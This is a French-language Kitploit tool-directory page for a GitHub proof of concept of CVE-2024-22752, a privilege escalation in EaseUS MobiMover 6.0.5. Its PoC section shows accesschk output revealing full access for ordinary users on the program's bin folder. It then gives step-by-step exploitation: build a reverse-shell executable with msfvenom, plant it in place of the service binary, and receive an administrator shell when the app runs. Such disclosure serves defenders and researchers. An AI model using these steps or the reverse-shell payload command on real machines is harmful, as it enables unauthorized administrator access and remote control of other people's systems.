Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-22752 — EaseUS MobiMover 6.0.5 Build 21620 - Permissions de fichiers et dossiers non sécurisées | Kitploit
Outils/GitHubGitHub/hacker625/cve-2024-22752
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationMauvaise ConfigurationExploitation de Binaires
GitHubhacker625/cve-2024-22752

CVE-2024-22752

EaseUS MobiMover 6.0.5 Build 21620 - Permissions de fichiers et dossiers non sécurisées

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

EaseUS MobiMover 6.0.5 Build 21620 - Permissions de fichiers et dossiers non sécurisées

MobiMoverUILaunch.exe souffre d'une vulnérabilité d'élévation de privilèges qui peut être utilisée par un « Utilisateur authentifié » pour modifier le fichier exécutable du service avec un binaire de son choix dans le dossier bin. La vulnérabilité existe en raison d'un ensemble de permissions faibles accordées au « Groupe des utilisateurs authentifiés » qui accorde le drapeau (M) alias « Modify Privilege »

alt text

Page d'accueil du fournisseur : https://www.easeus.com/
Lien du logiciel : https://down.easeus.com/product/mobimover_trial_setup
Google Drive : https://drive.google.com/file/d/1tqP00IV-WzqNpyE1Rnqwdg_44RxOhINQ/view?usp=sharing
Vidéo POC : https://www.youtube.com/watch?v=FR4cQm-z4Gw

#PoC

root@kitploit:~
C:\Users\creatigon>accesschk -uwvqd "C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin"

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
        FILE_ALL_ACCESS
  RW NT SERVICE\TrustedInstaller
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  1. Créer un fichier binaire malveillant sur Kali Linux avec msfvenom
    msfvenom -f exe -p windows/x64/shell_revese_tcp LHOST=<IP> LPORT=<PORT> -f exe -o prepare.exe

  2. Transférer le fichier 'prepare.exe' créé depuis Kali vers l'hôte Windows en tant qu'utilisateur de bas niveau

  3. Déplacer le fichier binaire 'prepare.exe' créé vers 'C:\Program Files (x86)\EaseUS\EaseUS MobiMover\bin\prepare.exe' pour remplacer l'ancien en tant qu'utilisateur de bas niveau

  4. Lorsque l'administrateur exécute l'application,vous obtiendrez un shell inverse en tant qu'administrateur

Télécharger l’outil